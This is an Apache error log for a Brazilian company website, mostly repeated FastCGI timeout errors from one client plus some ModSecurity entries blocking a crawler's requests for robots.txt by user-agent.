[Sun Mar 15 12:12:22.132163 2026] [proxy_fcgi:error] [pid 21806:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:60666] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:12:45.122093 2026] [proxy_fcgi:error] [pid 21806:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:60972] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:13:07.106696 2026] [proxy_fcgi:error] [pid 21946:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:33112] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:13:28.105813 2026] [proxy_fcgi:error] [pid 21946:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:33442] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:13:50.125771 2026] [proxy_fcgi:error] [pid 21533:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:33776] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:14:11.105900 2026] [proxy_fcgi:error] [pid 21946:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:34040] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:14:27.859063 2026] [:error] [pid 21806:tid 140411691570944] [client 74.7.228.16:33094] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbM09SswJuvopo3lOjoZQAAAIY"]
[Sun Mar 15 12:14:32.133842 2026] [proxy_fcgi:error] [pid 11972:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:34276] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:14:54.127245 2026] [proxy_fcgi:error] [pid 21806:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:34588] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:15:17.453964 2026] [proxy_fcgi:error] [pid 21806:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:34880] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:15:39.131820 2026] [proxy_fcgi:error] [pid 21806:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:35172] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:16:01.125800 2026] [proxy_fcgi:error] [pid 21805:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:35422] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:16:22.057830 2026] [proxy_fcgi:error] [pid 11972:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:35642] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:16:43.129776 2026] [proxy_fcgi:error] [pid 21533:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:35934] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:17:04.129798 2026] [proxy_fcgi:error] [pid 11972:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:36206] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:17:25.121850 2026] [proxy_fcgi:error] [pid 21806:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:36458] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:17:47.101783 2026] [proxy_fcgi:error] [pid 21805:tid 140411666392832] [client 179.188.53.243:36698] AH01067: Failed to read FastCGI header
[Sun Mar 15 12:17:47.101828 2026] [proxy_fcgi:error] [pid 21805:tid 140411666392832] (104)Connection reset by peer: [client 179.188.53.243:36698] AH01075: Error dispatching request to : 
[Sun Mar 15 12:18:08.133809 2026] [proxy_fcgi:error] [pid 21533:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:36948] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:18:29.097968 2026] [proxy_fcgi:error] [pid 21946:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:37172] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:18:51.124672 2026] [proxy_fcgi:error] [pid 21946:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:37398] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:19:12.129774 2026] [proxy_fcgi:error] [pid 21946:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:37722] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:19:33.126906 2026] [proxy_fcgi:error] [pid 21533:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:38132] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:19:34.324009 2026] [:error] [pid 21946:tid 140411683178240] [client 74.7.244.31:36610] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbOBnbQATo66fKoS7zKPAAAAMc"]
[Sun Mar 15 12:19:54.121783 2026] [proxy_fcgi:error] [pid 21946:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:38456] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:19:54.403426 2026] [:error] [pid 21805:tid 140411548894976] [client 74.7.228.16:58788] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbOGrABkC4fWIHEf8FvIAAAAFc"]
[Sun Mar 15 12:20:15.126536 2026] [proxy_fcgi:error] [pid 21946:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:38786] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:20:38.126140 2026] [proxy_fcgi:error] [pid 21805:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:39186] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:21:00.129888 2026] [proxy_fcgi:error] [pid 21805:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:39414] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:21:22.133776 2026] [proxy_fcgi:error] [pid 21806:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:39676] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:21:43.121857 2026] [proxy_fcgi:error] [pid 21533:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:39960] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:22:04.033818 2026] [proxy_fcgi:error] [pid 21533:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:40224] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:22:25.126566 2026] [proxy_fcgi:error] [pid 21533:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:40476] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:22:47.106172 2026] [proxy_fcgi:error] [pid 11972:tid 140411540502272] [client 179.188.53.243:40780] AH01067: Failed to read FastCGI header
[Sun Mar 15 12:22:47.106224 2026] [proxy_fcgi:error] [pid 11972:tid 140411540502272] (104)Connection reset by peer: [client 179.188.53.243:40780] AH01075: Error dispatching request to : 
[Sun Mar 15 12:23:09.141905 2026] [proxy_fcgi:error] [pid 21806:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:41060] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:23:31.129827 2026] [proxy_fcgi:error] [pid 21805:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:41298] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:23:52.121802 2026] [proxy_fcgi:error] [pid 21946:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:41578] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:24:13.121803 2026] [proxy_fcgi:error] [pid 21805:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:41862] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:24:35.125852 2026] [proxy_fcgi:error] [pid 21806:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:42182] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:24:40.313756 2026] [:error] [pid 21806:tid 140411691570944] [client 74.7.244.31:46386] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbPONSswJuvopo3lOjqLQAAAIY"]
[Sun Mar 15 12:24:56.137815 2026] [proxy_fcgi:error] [pid 11972:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:42514] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:25:17.141801 2026] [proxy_fcgi:error] [pid 11972:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:42784] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:25:38.127523 2026] [proxy_fcgi:error] [pid 21946:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:43052] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:25:59.130774 2026] [proxy_fcgi:error] [pid 21805:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:43354] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:26:06.979976 2026] [:error] [pid 21806:tid 140411599251200] [client 74.7.228.16:60502] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbPjtSswJuvopo3lOjqWQAAAJE"]
[Sun Mar 15 12:26:21.267589 2026] [proxy_fcgi:error] [pid 21533:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:43694] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:26:43.049816 2026] [proxy_fcgi:error] [pid 21533:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:43982] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:27:04.121802 2026] [proxy_fcgi:error] [pid 21533:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:44400] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:27:25.125024 2026] [proxy_fcgi:error] [pid 21533:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:44708] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:27:46.129792 2026] [proxy_fcgi:error] [pid 11972:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:45048] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:28:08.085880 2026] [proxy_fcgi:error] [pid 21806:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:45356] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:28:30.033911 2026] [proxy_fcgi:error] [pid 21533:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:45690] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:28:53.085884 2026] [proxy_fcgi:error] [pid 21533:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:45926] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:29:14.045832 2026] [proxy_fcgi:error] [pid 21946:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:46194] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:29:35.133801 2026] [proxy_fcgi:error] [pid 11972:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:46496] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:29:56.137807 2026] [proxy_fcgi:error] [pid 21946:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:46794] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:30:11.090412 2026] [:error] [pid 21946:tid 140411624429312] [client 74.7.244.31:35830] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbQgXbQATo66fKoS7zMSwAAAM4"]
[Sun Mar 15 12:30:18.125821 2026] [proxy_fcgi:error] [pid 21805:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:47036] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:30:39.053808 2026] [proxy_fcgi:error] [pid 21946:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:47260] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:31:02.141833 2026] [proxy_fcgi:error] [pid 21533:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:47562] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:31:10.804440 2026] [:error] [pid 21533:tid 140411674785536] [client 74.7.228.16:41648] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbQvnjZBu2q05ozVU_ZngAAAUg"]
[Sun Mar 15 12:31:23.121844 2026] [proxy_fcgi:error] [pid 21946:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:47860] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:31:44.133837 2026] [proxy_fcgi:error] [pid 21806:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:48128] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:32:05.097827 2026] [proxy_fcgi:error] [pid 11972:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:48360] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:32:26.117852 2026] [proxy_fcgi:error] [pid 21805:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:48604] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:32:54.129803 2026] [proxy_fcgi:error] [pid 21806:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:48968] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:33:15.069873 2026] [proxy_fcgi:error] [pid 21806:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:49280] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:35:18.582178 2026] [:error] [pid 11972:tid 140411599251200] [client 74.7.244.31:33892] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbRtpqj1wV0Si-OkedkOgAAABE"]
[Sun Mar 15 12:35:45.126912 2026] [proxy_fcgi:error] [pid 21805:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:51380] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:36:07.119152 2026] [proxy_fcgi:error] [pid 21533:tid 140411540502272] [client 179.188.53.243:51668] AH01067: Failed to read FastCGI header
[Sun Mar 15 12:36:07.119189 2026] [proxy_fcgi:error] [pid 21533:tid 140411540502272] (104)Connection reset by peer: [client 179.188.53.243:51668] AH01075: Error dispatching request to : 
[Sun Mar 15 12:36:28.125849 2026] [proxy_fcgi:error] [pid 21946:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:51970] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:36:28.585235 2026] [:error] [pid 21533:tid 140411641214720] [client 74.7.228.16:58684] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbR_HjZBu2q05ozVU_aTQAAAUw"]
[Sun Mar 15 12:36:49.133813 2026] [proxy_fcgi:error] [pid 21806:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:52260] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:37:10.085807 2026] [proxy_fcgi:error] [pid 21805:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:52474] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:37:31.121814 2026] [proxy_fcgi:error] [pid 21533:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:52672] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:37:53.121836 2026] [proxy_fcgi:error] [pid 21805:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:52936] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:38:14.122031 2026] [proxy_fcgi:error] [pid 21533:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:53190] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:38:35.069830 2026] [proxy_fcgi:error] [pid 21946:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:53416] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:38:56.125871 2026] [proxy_fcgi:error] [pid 21946:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:53688] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:39:17.065814 2026] [proxy_fcgi:error] [pid 11972:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:53980] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:39:38.137780 2026] [proxy_fcgi:error] [pid 21806:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:54246] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:39:59.122092 2026] [proxy_fcgi:error] [pid 21805:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:54532] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:40:20.069887 2026] [proxy_fcgi:error] [pid 11972:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:54792] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:40:41.153833 2026] [proxy_fcgi:error] [pid 21946:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:55036] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:40:46.954579 2026] [:error] [pid 21946:tid 140411557287680] [client 74.7.244.31:51418] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbS_nbQATo66fKoS7zNkQAAANY"]
[Sun Mar 15 12:41:03.057829 2026] [proxy_fcgi:error] [pid 11972:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:55304] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:41:25.131783 2026] [proxy_fcgi:error] [pid 21806:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:55512] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:41:42.455589 2026] [:error] [pid 21806:tid 140411582465792] [client 74.7.228.16:51576] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbTNtSswJuvopo3lOjsgwAAAJM"]
[Sun Mar 15 12:41:46.141766 2026] [proxy_fcgi:error] [pid 11972:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:55756] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:42:07.142569 2026] [proxy_fcgi:error] [pid 21533:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:56012] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:42:28.057813 2026] [proxy_fcgi:error] [pid 21805:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:56330] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:42:49.125814 2026] [proxy_fcgi:error] [pid 21806:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:56608] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:43:10.069842 2026] [proxy_fcgi:error] [pid 11972:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:56818] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:43:31.125842 2026] [proxy_fcgi:error] [pid 21946:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:57070] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:43:54.101781 2026] [proxy_fcgi:error] [pid 21533:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:57346] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:44:15.134705 2026] [proxy_fcgi:error] [pid 11972:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:57654] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:44:36.129804 2026] [proxy_fcgi:error] [pid 21806:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:57910] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:44:57.041837 2026] [proxy_fcgi:error] [pid 21805:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:58202] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:45:18.041799 2026] [proxy_fcgi:error] [pid 21533:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:58414] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:45:39.048182 2026] [proxy_fcgi:error] [pid 11972:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:58622] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:45:49.194463 2026] [:error] [pid 21805:tid 140411649607424] [client 74.7.244.31:56704] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbULbABkC4fWIHEf8FyiwAAAEs"]
[Sun Mar 15 12:46:03.125809 2026] [proxy_fcgi:error] [pid 21946:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:58978] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:46:28.329807 2026] [proxy_fcgi:error] [pid 21533:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:59252] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:46:50.125827 2026] [proxy_fcgi:error] [pid 21805:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:59486] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:46:56.962750 2026] [:error] [pid 21806:tid 140411574073088] [client 74.7.228.16:52586] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbUcNSswJuvopo3lOjtTwAAAJQ"]
[Sun Mar 15 12:47:11.131070 2026] [proxy_fcgi:error] [pid 21946:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:59712] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:47:32.121864 2026] [proxy_fcgi:error] [pid 21806:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:59948] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:47:53.144714 2026] [proxy_fcgi:error] [pid 11972:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:60276] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:48:14.167917 2026] [proxy_fcgi:error] [pid 11972:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:60592] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:48:35.130291 2026] [proxy_fcgi:error] [pid 11972:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:60824] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:48:56.129780 2026] [proxy_fcgi:error] [pid 21533:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:32834] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:49:17.121858 2026] [proxy_fcgi:error] [pid 21946:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:33100] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:49:38.065878 2026] [proxy_fcgi:error] [pid 21946:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:33380] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:50:00.145800 2026] [proxy_fcgi:error] [pid 21946:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:33646] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:50:22.345791 2026] [proxy_fcgi:error] [pid 21805:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:33922] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:50:44.121335 2026] [proxy_fcgi:error] [pid 21805:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:34192] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:51:06.121821 2026] [proxy_fcgi:error] [pid 21946:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:34426] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:51:13.963358 2026] [:error] [pid 21805:tid 140411624429312] [client 74.7.244.31:45348] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbVcbABkC4fWIHEf8FzLwAAAE4"]
[Sun Mar 15 12:51:27.122223 2026] [proxy_fcgi:error] [pid 21805:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:34710] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:51:49.123204 2026] [proxy_fcgi:error] [pid 11972:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:35022] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:52:11.021817 2026] [proxy_fcgi:error] [pid 21806:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:35276] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:52:12.589196 2026] [:error] [pid 21946:tid 140411658000128] [client 74.7.228.16:32832] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbVrHbQATo66fKoS7zPOwAAAMo"]
[Sun Mar 15 12:52:33.041813 2026] [proxy_fcgi:error] [pid 21805:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:35596] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:52:54.089928 2026] [proxy_fcgi:error] [pid 21533:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:35920] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:53:15.121881 2026] [proxy_fcgi:error] [pid 21946:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:36202] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:53:36.129792 2026] [proxy_fcgi:error] [pid 11972:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:36478] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:53:57.124479 2026] [proxy_fcgi:error] [pid 21806:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:36730] AH01075: Error dispatching request to : (polling)
